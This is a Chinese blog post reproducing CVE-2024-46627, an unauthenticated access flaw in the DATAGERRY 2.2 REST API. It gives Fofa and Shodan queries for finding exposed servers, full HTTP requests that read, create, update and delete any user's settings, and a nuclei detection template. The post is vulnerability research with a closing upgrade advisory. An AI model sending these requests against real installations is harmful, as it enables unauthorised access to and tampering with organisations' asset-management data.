DATAGERRY REST API身份验证绕过漏洞(CVE-2024-46627)

iSee857

已于 2024-10-11 10:57:26 修改

阅读量385

点赞数 12

分类专栏：漏洞复现文章标签：安全

于 2024-10-11 10:20:58 首次发布

本文链接：https://blog.csdn.net/xc_214/article/details/142846232

版权

漏洞复现专栏收录该内容

130 篇文章 13 订阅

订阅专栏

0X01 产品描述：

‌DATAGERRY是一个灵活的开源CMDB和资产管理工具，它完全将数据模型的定义留给用户。‌ 用户只需在一个易于使用的webfrontend中定义自己的对象类型（如服务器、路由器、租赁线路、位置等）。通过DATAGERRY的导出API，存储在DATAGERRY中的CMDB对象可以轻松地导出到外部系统，如监控系统、票据系统、配置管理等‌

0x02 漏洞描述：

DATAGERRY 2.2版本存在安全漏洞，该漏洞源于REST API 中缺少对以下端点的访问控制(/rest/users/<id>/settings/)，这允许攻击者在未经身份验证的情况下读取任何用户的设置、创建设置、删除设置和更新设置。

0x03 影响版本：

DATAGERRY ：2.2

0x04 搜索语句：

Fofa：title="datagerry"

0x05 漏洞复现：

该漏洞只出现在V2.2版本中，在REST API中缺少了对以下端点的访问控制，导致实现对用户配置增删改查

问题api

- /rest/users/<id>/settings/（获取、发布）

- /rest/users/<id>/settings/<setting>（删除、放置）

具体配置可以参考官网配置文档进行接口请求包构造：

2. User Management — DATAGERRY undefined documentation

复现过程：

获取所有设置对象：

GET /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

查询特定的某一个设置对象：

注意这里settings后的路由换成所想查询的resource数据

GET /rest/users/1/settings/framework-type?typeAddSuccess=3 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close

任意对象创建：

POST /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close

{
    "resource" : "framework-object-type-51121",
    "user_id" : 1,
    "setting_type" : "APPLICATION"
}

更新所创建的对象数据：

PUT /rest/users/1/settings/framework-object-type-5111 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close

{
    "resource" : "framework-object-type-5111",
    "user_id" : 1,
    "payload" : {},
    "setting_type" : "GLOBAL"
}

删除所选定的对象数据

DELETE /rest/users/1/settings/framework-object-type-51121 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close

附源自nuclei官网的poc

id: CVE-2024-46627

info:
  name: DATAGERRY - REST API Auth Bypass
  author: gy741
  severity: critical
  description: |
    Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
  impact: |
    Allows unauthorized access to REST API
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46627
    - https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
    - https://datagerry.com/
    - https://github.com/DATAGerry/
    - https://github.com/d4lyw/CVE-2024-46627
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-46627
    cwe-id: CWE-284
    epss-score: 0.00045
    epss-percentile: 0.16328
  metadata:
    verified: true
    max-request: 1
    vendor: becon
    product: datagerry
    shodan-query: http.title:"datagerry"
  tags: cve,cve2024,becon,datagerry,unauth,auth-bypass

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/users/1/settings/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"response_type":'
          - '"model":'
          - '"time":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c439

0x06 修复建议：

更新至最新版本